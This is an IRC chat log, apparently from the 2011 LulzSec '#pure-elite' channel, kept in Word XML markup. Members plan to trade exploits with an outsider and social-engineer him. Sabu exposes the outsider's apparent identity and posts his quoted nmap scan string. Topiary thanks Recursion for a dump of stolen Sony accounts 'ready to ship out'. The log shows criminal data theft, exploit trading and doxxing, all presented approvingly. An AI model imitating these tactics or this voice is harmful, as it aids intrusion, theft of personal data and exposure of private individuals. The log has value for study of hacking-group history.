        <w:t>Jun 01 15:49:18 neuron lol Jun 01 15:50:24 pwnsauce hmmmmm. time to backdoor me some peoples Jun 01 15:50:41 Topiary Fox&gt; [12:34:56] &lt;fox&gt; You got a messenger? I'd be happy to toss exploits and business back and forth.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 01 15:50:46 Topiary we got people offering us exploits Jun 01 15:51:03 neuron very nice Jun 01 15:51:17 neuron Topiary: is he ligit?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 01 15:51:44 Topiary he seems to know his shit, but he joined our chan on 2600 randomly (assuming from twitter) Jun 01 15:51:49 Topiary so... he's legit Jun 01 15:51:50 Topiary but Jun 01 15:51:52 Topiary not sure if we can trust him Jun 01 15:52:12 neuron well we can do business just don't let him in here? Jun 01 15:52:22 Topiary oh no no no definitely not coming in here Jun 01 15:52:26 Topiary we can set up a neutral chan on Unreal Jun 01 15:52:33 neuron sounds good Jun 01 15:52:50 Topiary this shit is sealed tight unless Sabu says the words "100% trusted" Jun 01 15:52:51 neuron wouldn't be a bad idea to get some contacts Jun 01 15:54:05 pwnsauce topiary - wht IRCd?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 01 15:54:09 pwnsauce or rather Jun 01 15:54:15 pwnsauce if they hand you exploits Jun 01 15:54:17 pwnsauce send to me Jun 01 15:54:24 pwnsauce some fags edit them or give fakes Jun 01 15:54:32 pwnsauce that really just rm -rf you : Jun 01 15:54:34 neuron aye i can read exploits as well Jun 01 15:54:39 neuron o/ Jun 01 15:54:55 pwnsauce aye - me Neuron and kayla can "check" them Jun 01 15:55:01 joepie92 I wouldn't assume anyone here would run any shit without checking what it does Jun 01 15:55:02 joepie92 tbh Jun 01 15:55:03 joepie92 lol Jun 01 15:55:17 Topiary well guys put on fake names, don't give him personal info, get onto irc.unrealirc.net (or .com can't remember), do /mode &lt;you&gt; +T Jun 01 15:55:23 Topiary then we can all talk to these fags Jun 01 15:55:26 pwnsauce joepie - I have been nailed by a few things :( Jun 01 15:55:27 Topiary as a personal business channel Jun 01 15:55:33 joepie92 pwnsauce: ?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 01 15:56:52 pwnsauce joepie - fake OpenSSH exploit :( Jun 01 15:56:56 pwnsauce and some backdoored shit Jun 01 15:57:00 joepie92 ahhh Jun 01 15:57:08 joepie92 never run shit unless you read it Jun 01 15:57:18 * Neuron_ (Neuron@HA-1rf.d61.5kgcfl.IP) has joined #pure- elite Jun 01 15:57:21 pwnsauce aye, I was just SO excited Jun 01 15:57:28 pwnsauce openSSH 5.* 0day Jun 01 15:57:28 &lt;neuron_&gt; back Jun 01 15:57:30 &lt;neuron_&gt; what did i miss Jun 01 15:57:34 joepie92 lol Jun 01 15:57:44 &lt;neuron_&gt; lol hes selling one?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 01 15:57:47 pwnsauce No Jun 01 15:57:51 pwnsauce I was saying Jun 01 15:57:55 pwnsauce I got a fake sploit for it Jun 01 15:57:58 pwnsauce and it rm ed me Jun 01 15:57:59 &lt;neuron_&gt; oo :( Jun 01 15:58:04 &lt;neuron_&gt; sad day Jun 01 15:58:24 Topiary sorry that's irc.unrealircd.org Jun 01 15:58:51 * Neuron has quit (Ping timeout: 121 seconds) Jun 01 15:59:18 Topiary okay channel is called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Jun 01 15:59:20 &lt;neuron_&gt; what channel Jun 01 15:59:39 trollpoll guys, if i were you, i would not trust anyone of this #lulzsec chan Jun 01 15:59:47 Topiary I trust none of them Jun 01 15:59:53 Topiary we can reverse SE this guy, just don't give anything away Jun 01 15:59:57 &lt;neuron_&gt; rgr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16:00:08 Topiary if he's Jesterfag we can use our spies to report Jun 01 16:00:56 * Topiary facepalms and LOLs at you guys Jun 01 16:00:59 Topiary &gt;Neuron joins Jun 01 16:01:03 Topiary &gt;also-cock (pwnsauce@) Jun 01 16:01:03 &lt;neuron_&gt; im fine with it :P Jun 01 16:01:16 &lt;neuron_&gt; i really don't mind my name being that :P Jun 01 16:02:06 trollpoll joepie92, you always use the same nick?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 01 16:02:13 joepie92 well Jun 01 16:02:18 trollpoll (well 91, 92...) Jun 01 16:02:18 * joepie92 is now known as joepie91 Jun 01 16:02:18 joepie91 is my actual nick Jun 01 16:02:18 trollpoll xD Jun 01 16:02:19 joepie91 but Jun 01 16:02:21 joepie91 if I disconnect Jun 01 16:02:24 joepie91 and joepie91 is still here Jun 01 16:02:31 joepie91 my client increments my nick Jun 01 16:02:32 joepie91 idk why Jun 01 16:02:38 joepie91 thus joepie91 Jun 01 16:02:38 Topiary well just make sure we never give any link to Anonymous/ourselves when talking to contacts on the IRC Jun 01 16:02:43 joepie91 I've hit shit like joepie184 before Jun 01 16:02:43 joepie91 lol Jun 01 16:02:44 trollpoll i mean, anywhere you go, you use the same nick? Jun 01 16:02:47 joepie91 ya Jun 01 16:02:51 trollpoll of course Jun 01 16:03:06 &lt;neuron_&gt; Aye Topiary Jun 01 16:03:15 Topiary okay pwnsauce you're gonna have to pretend to just be another trading partner Jun 01 16:03:18 Topiary as pwnsauce == Anonymous Jun 01 16:03:22 joepie91 trollpoll: why? :P Jun 01 16:03:45 trollpoll nothing, cos if i were you i would feel unsecure using the same nick around Jun 01 16:04:14 pwnsauce k Jun 01 16:04:57 &lt;neuron_&gt; if i randomly drop its because my connection hates me Jun 01 16:06:40 joepie91 trollpoll: I literally have pretty much nothing to hide Jun 01 16:06:43 storm hi Jun 01 16:06:45 joepie91 so how would I be insecure? :P Jun 01 16:06:51 Topiary I hope this is a Jesterfag, we can inject some fake d0x Jun 01 16:07:02 pwnsauce I hope not Jun 01 16:07:07 pwnsauce wants free exploits Jun 01 16:07:13 &lt;neuron_&gt; lol Jun 01 16:07:23 trollpoll well, just being here, is something to hide... Jun 01 16:07:34 trollpoll (in my opinion) Jun 01 16:07:43 storm good opinion Jun 01 16:07:46 &lt;neuron_&gt; lol Jun 01 16:08:20 &lt;neuron_&gt; if hes a jesterfag it would be the first time my nick is put on the map Jun 01 16:08:25 Topiary there's gold here, he knows his shit Jun 01 16:08:29 Topiary we can get something out of him Jun 01 16:08:39 sabu what you guys are doing?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 01 16:08:45 storm ]just woke up Jun 01 16:08:55 Topiary found someone in our #lulzsec chan that knows his shit, got talking to him Jun 01 16:08:57 trollpoll but, hey, i dont have nothing with this, i mean, its okey, i just where thinking on our anonymity...</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 01 16:09:03 Topiary invited him to a neutral chan where we're feeling him out Jun 01 16:09:05 Topiary he's probably aspy Jun 01 16:09:22 Topiary and if he is, then we can throw them off course Jun 01 16:09:24 joepie91 trollpoll: being in an irc channel is not illegal :D Jun 01 16:09:25 Topiary if he isn't, free exploits Jun 01 16:09:29 Topiary nobody fuck up and we win Jun 01 16:09:31 Topiary ___ Jun 01 16:09:33 &lt;neuron_&gt; rgr Jun 01 16:09:43 &lt;neuron_&gt; i won't say anything other then to direct the convo Jun 01 16:09:49 trollpoll i know :) but, i dont want to be incocent, i want to look like :D Jun 01 16:09:57 joepie91 lol Jun 01 16:10:04 sabu good shit Jun 01 16:10:06 joepie91 there's a reason I typically stay clear of blatantly illegal stuff :P Jun 01 16:10:12 sabu heres the funny part Jun 01 16:10:21 trollpoll hehe, nice ;) Jun 01 16:10:27 sabu one sec Jun 01 16:11:01 &lt;neuron_&gt; Sabu: do you want irc.unrealircd.org Jun 01 16:11:05 &lt;neuron_&gt;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Jun 01 16:11:14 sabu ok sec Jun 01 16:11:59 Topiary make sure to Anon it up, also +T yourself (no CTCP) Jun 01 16:12:05 Topiary Unreal &lt;3 for that mode Jun 01 16:12:28 Topiary OH LOL you're Brazil Jun 01 16:12:40 &lt;neuron_&gt; o god XD Jun 01 16:12:59 Topiary well everyone gather round and watch Sabu go insane Jun 01 16:12:59 &lt;neuron_&gt; Wai twhats going on?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 01 16:13:03 Topiary with his Brazil impression Jun 01 16:13:16 &lt;neuron_&gt; o god Jun 01 16:13:41 trollpoll from brazil? im gonna enter the chan (ill be quiet) Jun 01 16:13:52 Topiary &lt;brazil&gt; HEUHEAUEHAUHAUEHAHEAUEHUHheuheushHUAHUehuuhuUEUue Jun 01 16:13:55 &lt;neuron_&gt; lmfao Jun 01 16:13:55 Topiary cracks me up man Jun 01 16:13:56 [redacted] LOL WUT Jun 01 16:14:03 Topiary he was doing this for like an hour in lulzsec Jun 01 16:14:04 [redacted] you got rm'd by a fake OpenSSH exploit?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 01 16:14:21 pwnsauce [redacted] - yes Jun 01 16:14:27 pwnsauce and a fake IIS 6 overflow Jun 01 16:14:30 pwnsauce a year ago Jun 01 16:14:32 &lt;neuron_&gt; owch Jun 01 16:14:34 [redacted] Lulzsec - The hacker elite Jun 01 16:14:49 Topiary that's okay I became part of a Japanese botnet once Jun 01 16:14:50 sabu topiary Jun 01 16:14:54 sabu that guy that gave me senate Jun 01 16:14:58 sabu is the guy that owned g00ns Jun 01 16:14:59 sabu ROFL Jun 01 16:15:03 Topiary fucking awesome Jun 01 16:15:25 &lt;neuron_&gt; why is sabu acting like brazil again? Jun 01 16:15:38 Topiary watch and see Jun 01 16:15:44 Topiary Fox is gonna spill all the juice Jun 01 16:15:48 &lt;neuron_&gt; lul Jun 01 16:17:43 sabu I just Jun 01 16:17:45 sabu socialed Jun 01 16:17:45 sabu him Jun 01 16:17:46 sabu hard.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 01 16:17:52 * Neuron_ calps Jun 01 16:18:11 &lt;neuron_&gt; lol suddenly not typing in all acps XD Jun 01 16:18:20 sabu ;) Jun 01 16:19:07 Topiary your Brazil social game cracks me up Jun 01 16:19:11 Topiary bravo Jun 01 16:19:15 sabu ;) Jun 01 16:19:26 Topiary nobody can shut their mouths with that fucking HehuhehuheahauHAUHUhauhUAHUEHE Jun 01 16:19:30 Topiary on your ass every 2 seconds Jun 01 16:19:31 sabu hahahahhaha Jun 01 16:19:34 &lt;neuron_&gt; its so annoying XE Jun 01 16:19:45 joepie91 http://www.wired.com/threatlevel/2011/06/silkroad/ Jun 01 16:19:47 sabu its so true too have oyu guys ever talked to a real hardcore brazillian hacker?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 01 16:19:51 sabu they are out of control ....</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 01 16:19:58 &lt;neuron_&gt; nope Jun 01 16:21:37 sabu &lt;brazil&gt; Fox, a gentlemen never tells Jun 01 16:21:37 sabu &lt;@Fox&gt; AHHH I LOVE THAT ANSWER Jun 01 16:21:37 sabu &lt;brazil&gt; but if you work with us Jun 01 16:21:37 sabu &lt;@Fox&gt; I literally smiled Jun 01 16:21:38 sabu &lt;@Fox&gt; rofl Jun 01 16:21:40 sabu HAHAHAHAHHAHHHAHAHAHHZHAHZHHH Jun 01 16:22:06 trollpoll lol Jun 01 16:22:23 &lt;neuron_&gt; Sabu you are a god Jun 01 16:22:24 &lt;neuron_&gt; :P Jun 01 16:22:46 sabu thanks sir Jun 01 16:23:01 &lt;neuron_&gt; is Fox trustable?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 01 16:23:02 pwnsauce Sabu - as far as he knows im some random Jun 01 16:23:04 sabu consider yourselves lucky no one really gets to see me work in action Jun 01 16:23:14 sabu no one is trustable outside out crew Jun 01 16:23:17 sabu remember that neuron Jun 01 16:23:20 sabu our* Jun 01 16:24:20 Topiary nakomis&gt; found something for you Jun 01 16:24:20 Topiary &lt;whirlpool&gt; they log PMs here Jun 01 16:24:21 Topiary &lt;nakomis&gt; k Jun 01 16:24:28 &lt;neuron_&gt; rgr Jun 01 16:24:28 Topiary that's what you call a 1337 back-and-forth Jun 01 16:24:31 Topiary put that shit in a movie Jun 01 16:24:36 &lt;neuron_&gt; haha Jun 01 16:25:11 trollpoll well, is clear that in #lulzsec channel the half part of them are feds...</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 01 16:25:26 sabu yup Jun 01 16:25:45 trollpoll btw who is nakomis?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 01 16:25:48 trollpoll lol?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 01 16:25:57 Topiary some Anonfag Jun 01 16:25:58 sabu hes some ex-military guy thats "anon" Jun 01 16:26:00 sabu you know Jun 01 16:26:05 &lt;neuron_&gt; ahh Jun 01 16:26:06 sabu hes marine intelligence right topiary?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 01 16:26:08 sabu thats what he told me Jun 01 16:26:11 sabu ex-marine Jun 01 16:26:16 Topiary not sure, seen him on TinyChat Jun 01 16:26:22 Topiary the person who made that Anon wiki thinks he's with us Jun 01 16:26:29 sabu who made that Jun 01 16:26:34 Topiary nonynews Jun 01 16:26:40 Topiary we got IPs Jun 01 16:26:48 Topiary they listed you and nakomis as my "associates" Jun 01 16:27:13 trollpoll ok Jun 01 16:28:01 joepie91 joepie92- Whois list of nonyNews Jun 01 16:28:01 joepie91 joepie92- Realname: nonyNews Jun 01 16:28:01 joepie91 joepie92- Hostmask: nonyNews!~anon@server106963.santrex.net * Jun 01 16:28:01 joepie91 joepie92- nonyNews is on: #lulzsec Jun 01 16:28:01 joepie91 joepie92- Server: collective.2600.net (Arghhh, Scourge of the seven seas!) Jun 01 16:28:01 joepie91 joepie92- End of /WHOIS list.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 01 16:28:41 Topiary we're gonna be using that 2600 chan as a way of correlating data from AnonOps' past/wikis Jun 01 16:28:42 trollpoll nakomis is the name of a novel character of Katherine Neville Jun 01 16:28:44 Topiary to assess spies Jun 01 16:28:46 trollpoll Nakomis Key Jun 01 16:28:49 trollpoll and... is a girl.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 01 16:28:52 Topiary it's a front really Jun 01 16:30:01 sabu this guy fox Jun 01 16:30:04 sabu might be bullshit Jun 01 16:30:11 sabu may even better jester himself Jun 01 16:30:11 * Neuron_ has quit (Ping timeout: 121 seconds) Jun 01 16:30:26 Topiary mm Jun 01 16:30:28 Topiary crossed my mind Jun 01 16:30:33 [redacted] netjester Jun 01 16:31:02 pwnsauce I'm being nice to hom Jun 01 16:31:08 pwnsauce *him Jun 01 16:31:16 pwnsauce going to get ALL his goodies Jun 01 16:31:22 Topiary by all means sap shit out of him Jun 01 16:31:29 Topiary if he is a spy, he'll do that to gain trust Jun 01 16:31:53 pwnsauce exactly Jun 01 16:31:57 pwnsauce TBH Jun 01 16:32:09 pwnsauce im just goodierping Jun 01 16:34:18 sabu HAHAHHAAHA Jun 01 16:34:20 sabu I JUST FIGUREDO UT Jun 01 16:34:21 sabu WHO HE IS Jun 01 16:34:22 sabu AHAHAHAH Jun 01 16:34:26 sabu Faggot.s Jun 01 16:34:42 trollpoll when will the Sony-CTF restart?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 01 16:35:04 pwnsauce Sabu - tell pl0x Jun 01 16:35:07 sabu dude Jun 01 16:35:09 sabu he fucked up Jun 01 16:35:15 pwnsauce yeag I know Jun 01 16:35:18 sabu &lt;@Fox&gt; rob@SECRETFUCKINGLAIR # ~$cat nmapawesomeness Jun 01 16:35:18 pwnsauce "rob" Jun 01 16:35:18 sabu &lt;@Fox&gt; nmap -P0 -sS -sV -O -A --defeat-rst-ratelimit - F ip_address Jun 01 16:35:18 sabu &lt;@Fox&gt; The other one is a xerobank VPN set Jun 01 16:35:18 sabu &lt;brazil&gt; all I see is a nmap line Jun 01 16:35:18 sabu &lt;@Fox&gt; I'll package up the VPN information here in a few Jun 01 16:35:18 sabu &lt;@also-cocks&gt; this is a superfast nmap string... Jun 01 16:35:18 sabu &lt;@also-cocks&gt; by the looks of it Jun 01 16:35:18 sabu &lt;@Fox&gt; I &lt;3 that string.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 01 16:35:18 sabu &lt;@also-cocks&gt; it rm-s the RST limit so it scans faster Jun 01 16:35:18 sabu &lt;@also-cocks&gt; hmmmm Jun 01 16:35:18 sabu &lt;brazil&gt; rob you still got access to hostgator? Jun 01 16:35:18 sabu &lt;@Fox&gt; lol, I can, but not at this second. Jun 01 16:35:18 sabu &lt;@Fox&gt; por que?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 01 16:35:18 sabu &lt;brazil&gt; they have a few targets I'd like to own :) Jun 01 16:35:21 pwnsauce florida Jun 01 16:35:22 sabu ROFL Jun 01 16:35:34 sabu he just admitted oh man Jun 01 16:35:36 pwnsauce Sabu - Rob, Florida, Smokes, Jun 01 16:35:36 sabu oh so bad Jun 01 16:35:45 pwnsauce pentest cmpany Jun 01 16:35:48 pwnsauce who is he?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 01 16:35:59 sabu he is founder of hostgater bro Jun 01 16:36:00 sabu lol Jun 01 16:36:06 joepie91 wat Jun 01 16:36:22 sabu hahahahahah Jun 01 16:36:26 sabu if this is the real rob Jun 01 16:36:29 sabu we have a gold mind Jun 01 16:36:31 sabu mine Jun 01 16:36:48 pwnsauce :O Jun 01 16:36:49 joepie91 wait Jun 01 16:36:49 joepie91 so Jun 01 16:36:52 sabu I know he's starting to regret coming in here Jun 01 16:36:52 joepie91 you are talking Jun 01 16:36:54 sabu or rather Jun 01 16:36:55 trollpoll hostgator? omg Jun 01 16:36:57 joepie91 to the founder of hostgator Jun 01 16:36:58 joepie91 ?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 01 16:36:58 sabu hes regretting Jun 01 16:37:02 sabu that I even fucking logged on that irc Jun 01 16:37:07 sabu I figured his whole shit out Jun 01 16:37:08 sabu rofl Jun 01 16:37:18 * joepie91 palmfaces Jun 01 16:40:23 * Disconnected (Remote host closed socket).</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>* * ** ENDING LOGGING AT Wed Jun 1 16:40:23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12:49:34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12:49:34 * Now talking on #pure-elite Jun 02 12:49:34 * Topic for #pure-elite is: pE | no leaks | respect each other | research and exploit development++ Jun 02 12:49:34 * Topic for #pure-elite set by Sabu!sabu@netadmin.operationfreedom.ru at Thu Jun 2 00:21:58 2011 Jun 02 12:49:38 [redacted] hello :] * * ** ENDING LOGGING AT Thu Jun 2 12:50:54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12:50:54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12:55:36 Topiary http://lulzsecurity.com/ * * ** BEGIN LOGGING AT Thu Jun 2 13:25:39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13:25:39 * Now talking on #pure-elite Jun 02 13:25:39 * Topic for #pure-elite is: pE | no leaks | respect each other | research and exploit development++ Jun 02 13:25:39 * Topic for #pure-elite set by Sabu!sabu@netadmin.operationfreedom.ru at Thu Jun 2 00:21:58 2011 Jun 02 13:29:51 Recursion Topiary: am now, whats up?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 02 13:30:12 Topiary nothing man, just letting you know thanks for the Sony dumpage Jun 02 13:30:15 Topiary we got it all ready to ship out Jun 02 13:30:20 Recursion not a problem Jun 02 13:30:28 Recursion I'm still pulling more accounts, btw Jun 02 13:30:44 Topiary should be enough Jun 02 13:30:47 Topiary we got it all archived/sorted Jun 02 13:31:51 Recursion lulzsecurity.com is down :( Jun 02 13:32:06 Topiary should be back up Jun 02 13:32:17 Recursion 500 Internal Server Error Jun 02 13:32:18 Recursion nginx/1.0.4 Jun 02 13:32:39 &lt;hsien&gt; ;/ Jun 02 13:47:41 joepie92 Jun 02 13:49:28 Recursion welp Jun 02 13:49:31 Recursion I just puked...</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 02 13:49:36 Recursion no idea why Jun 02 13:50:57 neuron Topiary: lulzsecurity is our site?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 02 13:51:10 Topiary yeah Jun 02 13:51:19 neuron \o/ Jun 02 13:51:43 neuron ;( sorry Recursion ..</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 02 13:52:46 neuron Topiary: website is offline Jun 02 13:52:50 neuron no cahced version avalible Jun 02 13:53:19 Topiary yarp, our website beast is putting it behind cloudfire Jun 02 13:53:29 neuron whos are website beast?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 02 13:54:20 Recursion just came up for me Jun 02 13:55:20 joepie92 works here now Jun 02 13:55:31 joepie92 cloudflare = win Jun 02 13:55:32 joepie92 imo Jun 02 13:55:46 Recursion also, fucking lul on the Friday song Jun 02 13:55:49 Recursion who did this?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 02 13:55:54 Recursion they deserve mad props.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 02 13:57:00 Topiary he goes by many names _________ Jun 02 13:57:10 Topiary one of them is tflow, in fact all of them are tflow Jun 02 13:57:23 * lol gives channel operator status to [redacted] Neuron Jun 02 13:57:38 neuron still trying to load Jun 02 13:59:02 Topiary y so opendns Jun 02 14:21:43 joepie92 Topiaryone of them is tflow, in fact all of them are tflow Jun 02 14:21:44 joepie92 lol'd Jun 02 14:29:29 Topiary site is back up Jun 02 14:31:29 joepie92 Topiary, where is it hosted?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 02 14:31:48 Topiary one of our sexy boxes of sex Jun 02 14:31:49 joepie92 also, pm Jun 02 14:31:52 Topiary also cocks Jun 02 14:33:06 * anonny (anonny@HA-qg9.p22.ibfo0m.IP) has joined #pure- elite Jun 02 14:33:15 * anonny is now known as kl0ps Jun 02 14:33:19 kl0ps hello o/ Jun 02 14:34:32 * pwnsauce (pwnsauce@HA-qu1.ba8.pn6gun.IP) has joined #pure- elite Jun 02 14:35:02 pwnsauce hey :D Jun 02 14:35:20 pwnsauce Neuron - hows it all workin?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 02 14:35:24 kl0ps hi pwnsauce Jun 02 14:37:20 lol hello pwnsauce hello kl0ps :D Jun 02 14:37:24 lol whats new :D?</w:t>
      </w:r>
